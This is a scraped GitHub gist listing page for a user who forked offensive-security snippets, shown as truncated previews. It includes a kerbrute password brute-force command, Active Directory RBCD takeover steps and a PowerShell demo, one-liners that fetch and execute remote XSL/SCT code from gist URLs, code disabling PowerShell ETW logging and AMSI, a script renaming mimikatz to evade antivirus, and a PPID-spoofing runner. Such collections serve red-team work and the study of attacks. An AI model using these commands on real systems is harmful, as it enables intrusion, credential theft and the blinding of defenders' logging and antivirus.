With kerbrute.py:
python kerbrute.py -domain <domain_name> -users <users_file> -passwords <passwords_file> -outputfile <output_file>With Rubeus version with brute module:
0xAJStrike
0xAJStrike
/ kerberos_attacks_cheatsheet.md
Created
February 27, 2022 15:32
— forked from TarlogicSecurity/kerberos_attacks_cheatsheet.md
A cheatsheet with commands that can be used to perform kerberos attacks
0xAJStrike
/ Workstation-Takeover.md
Created
February 27, 2022 15:32
— forked from gladiatx0r/Workstation-Takeover.md
From RPC to RCE - Workstation Takeover via RBCD and MS-RPChoose-Your-Own-Adventure
In the default configuration of Active Directory, it is possible to remotely take over Workstations (Windows 7/10/11) and possibly servers (if Desktop Experience is installed) when their WebClient service is running. This is accomplished in short by;
- Triggering machine authentication over HTTP via either MS-RPRN or MS-EFSRPC (as demonstrated by @tifkin_). This requires a set of credentials for the RPC call.
- Relaying that machine authentication to LDAPS for configuring RBCD
- RBCD takeover
The caveat to this is that the WebClient service does not automatically start at boot. However, if the WebClient service has been triggered to start on a workstation (for example, via some SharePoint interactions), you can remotely take over that system. In addition, there are several ways to coerce the WebClient service to start remotely which I cover in a section below.
0xAJStrike
/ rbcd_demo.ps1
Created
February 27, 2022 15:32
— forked from HarmJ0y/rbcd_demo.ps1
Resource-based constrained delegation computer DACL takeover demo
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| # import the necessary toolsets | |
| Import-Module .\powermad.ps1 | |
| Import-Module .\powerview.ps1 | |
| # we are TESTLAB\attacker, who has GenericWrite rights over the primary$ computer account | |
| whoami | |
| # the target computer object we're taking over | |
| $TargetComputer = "primary.testlab.local" |
0xAJStrike
/ PowerShell.txt
Created
February 27, 2022 15:32
— forked from mgeeky/PowerShell.txt
Snippets of PowerShell bypass/evasion/execution techniques that are interesting
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| ############################################################################## | |
| ### Powershell Xml/Xsl Assembly "Fetch & Execute" | |
| ### [https://twitter.com/bohops/status/966172175555284992] | |
| $s=New-Object System.Xml.Xsl.XsltSettings;$r=New-Object System.Xml.XmlUrlResolver;$s.EnableScript=1;$x=New-Object System.Xml.Xsl.XslCompiledTransform;$x.Load('https://gist.githubusercontent.com/bohops/ee9e2d7bdd606c264a0c6599b0146599/raw/f8245f99992eff00eb5f0d5738dfbf0937daf5e4/xsl-notepad.xsl',$s,$r);$x.Transform('https://gist.githubusercontent.com/bohops/ee9e2d7bdd606c264a0c6599b0146599/raw/f8245f99992eff00eb5f0d5738dfbf0937daf5e4/xsl-notepad.xml','z');del z; | |
| ############################################################################## | |
| ### Powershell VBScript Assembly SCT "Fetch & Execute" | |
| ### [https://twitter.com/bohops/status/965670898379476993] |
0xAJStrike
/ DisablePSEtw.ps1
Created
February 27, 2022 15:33
— forked from S3cur3Th1sSh1t/DisablePSEtw.ps1
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| [System.Diagnostics.Eventing.EventProvider].GetField('m_enabled','NonPublic,Instance').SetValue([Ref].Assembly.GetType('System.Management.Automation.Tracing.PSEtwLogProvider').GetField('etwProvider','NonPublic,Static').GetValue($null),0) |
0xAJStrike
/ mimikatz_obfuscator.sh
Created
February 27, 2022 15:33
— forked from S3cur3Th1sSh1t/mimikatz_obfuscator.sh
Mimikatz Obfuscator
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| # This script downloads and slightly "obfuscates" the mimikatz project. | |
| # Most AV solutions block mimikatz based on certain keywords in the binary like "mimikatz", "gentilkiwi", "benjamin@gentilkiwi.com" ..., | |
| # so removing them from the project before compiling gets us past most of the AV solutions. | |
| # We can even go further and change some functionality keywords like "sekurlsa", "logonpasswords", "lsadump", "minidump", "pth" ...., | |
| # but this needs adapting to the doc, so it has not been done, try it if your victim's AV still detects mimikatz after this program. | |
| git clone https://github.com/gentilkiwi/mimikatz.git windows | |
| mv windows/mimikatz windows/candycrush | |
| find windows/ -type f -print0 | xargs -0 sed -i 's/mimikatz/candycrush/g' | |
| find windows/ -type f -print0 | xargs -0 sed -i 's/MIMIKATZ/CANDYCRUSH/g' |
0xAJStrike
/ LogonEvents.ps1
Created
February 27, 2022 15:34
— forked from S3cur3Th1sSh1t/LogonEvents.ps1
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| Clear-Host | |
| $user = $null | |
| $date = $null | |
| $computer = $null | |
| $Computer = Read-Host "Computername?" | |
| $isonline = Test-Connection $Computer -Count 1 -ErrorAction SilentlyContinue | |
| $date = (get-date).AddDays(-100) #choose number of days to go back | |
| if($isonline){ |
0xAJStrike
/ DisAblePSLogging.cs
Created
February 27, 2022 15:34
— forked from S3cur3Th1sSh1t/DisAblePSLogging.cs
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| using System; | |
| using System.Management.Automation; | |
| using System.Reflection; | |
| namespace PSLoggingBypass | |
| { | |
| /* | |
| One of the many ways one could disabled PS logging/AMSI if there's prior code execution. | |
| Author: Lee Christensen (@tifkin_) |
0xAJStrike
/ Invoke-winPEAS.ps1
Created
February 27, 2022 15:34
— forked from S3cur3Th1sSh1t/Invoke-winPEAS.ps1
winPEAS in powershell
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| function Invoke-winPEAS | |
| { | |
| [CmdletBinding()] | |
| Param ( | |
| [Parameter(Position = 0, Mandatory = $true)] | |
| [ValidateNotNullorEmpty()] | |
| [String] | |
| $Command | |
| ) |
0xAJStrike
/ Run-SecurePS.ps1
Created
February 27, 2022 15:34
— forked from S3cur3Th1sSh1t/Run-SecurePS.ps1
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| function Run-SecurePS | |
| { | |
| Param | |
| ( | |
| [string] | |
| $argument | |
| ) | |
| $PPIDSpoofBlock = @" |
OlderNewer